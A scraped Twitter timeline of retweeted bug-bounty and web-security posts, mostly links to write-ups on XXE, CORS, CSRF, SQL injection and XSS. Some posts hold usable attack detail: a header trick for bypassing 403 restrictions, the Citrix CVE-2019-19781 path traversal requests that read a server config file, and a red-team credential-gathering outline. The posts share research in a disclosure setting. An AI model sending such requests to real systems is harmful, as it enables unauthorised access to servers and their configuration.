Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @kl_sree
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @kl_sree
-
KL Sreeram proslijedio/la je Tweet
2019 has been a record-breaking year on lots of fronts - thanks to you all! Keep up your awesome discoveries.https://security.googleblog.com/2020/01/vulnerability-reward-program-2019-year.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
How to Red Team #1 - A twitter red team mind map Need credentials from the outside? 1. OSINT (Find e-mail/PII) 2. Social Engineer (Trick someone into clicking an e-mail you sent them w/o a payload) 3. Target External Services (Password Spray or find a vulnerable service )
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
This blind XXE technique for out-of-band exfiltration was one of the core use cases we had in mind when developing Burp Collaborator:https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
I have made a demo application to abuse Google Chrome cache by exploiting CORS. The code is big messy but it works. Original research was from
@BitK_ Reviews are appreciated :-) https://github.com/MayurUdiniya/Chrome-CORS …#bugbounty#infosecHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
if you find 403 Forbidden while testing. Try X-Original-URL and X-Rewrite-URL Headers to bypass restrictions
#Collectedpic.twitter.com/CA3ZYhRy0A
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
KL Sreeram proslijedio/la je Tweet
"Hey the app keeps crashing, what should we do?" "Just put 'Display not in use' on the desktop wallpaper"pic.twitter.com/ijXGSbUVaU
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
GGvulnz — How I hacked hundreds of companies through Google Groupshttps://medium.com/@milanmagyar/ggvulnz-how-i-hacked-hundreds-of-companies-through-google-groups-b69c658c8924 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
20k bug Write-Up How we broke PHP, hacked Pornhub and earned $20,000 https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/ … How spending our Saturday hacking earned us €20.000 https://medium.com/@matti.bijnens/how-spending-our-saturday-hacking-earned-us-20k-60990c4678d4 …
#bugbounty,#bugbountytipsHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
I just published Adding a malicious notebook to be treated like a trusted notebook in Google Colab — 1337$ https://link.medium.com/LENn7P8Xj3
@googlevrp#bugbountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
KL Sreeram proslijedio/la je Tweet
Voting is now open for the top 10 new web hacking techniques of 2019:https://portswigger.net/polls/top-10-web-hacking-techniques-2019 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
CVE-2017-18638: A module I submitted to
@detectify for detecting a#SSRF vulnerability in Graphite is now live! Here's@orange_8361's original writeup about exploiting this vuln as part of an exploit chain for a $12,500 Bug Bounty from@githubhttps://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html#second-bug-internal-graphite-ssrf …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
Yo hackers! I've built a small website that has some
#XSS challenges.
http://xss.pwnfunction.com
The main challenge for the week is `WW3`
All upcoming challenges will be hosted there, so stay tuned :)
Would love to know what you guys think. Have fun!pic.twitter.com/0vGboYQIY7
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
Hunting Good Bugs with only <HTML> - Ak1T4 - Mediumhttps://medium.com/@know.0nix/hunting-good-bugs-with-only-html-d8fd40d17b38 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
This bug, fixed in latest Firefox, led to pretty interesting research, how you can exfiltrate data in Firefox with a single injection point (ie. no reloading iframes). I’m going to publish the trick soon.pic.twitter.com/tV8yBR1wPc
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
New Writing Bypass SameSite Cookies Default to Lax and get CSRF Looking at a new Chrome feature and the 2 minute quirk which make it possible to bypass it, also solution to my CSRF challenge.
#CSRF#SameSitehttps://medium.com/@renwa/bypass-samesite-cookies-default-to-lax-and-get-csrf-343ba09b9f2b …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcastpic.twitter.com/a6ehfTRIaJ
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je Tweet
For the sake of exercising, I looked up some web challenges in a
#tetctf and noticed a cool SQLi one "Secure System". I discovered some cool stuff that you will not find it in tutorials so check it out!
https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952 …
#ctf#bugbountytips#sqlPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
KL Sreeram proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

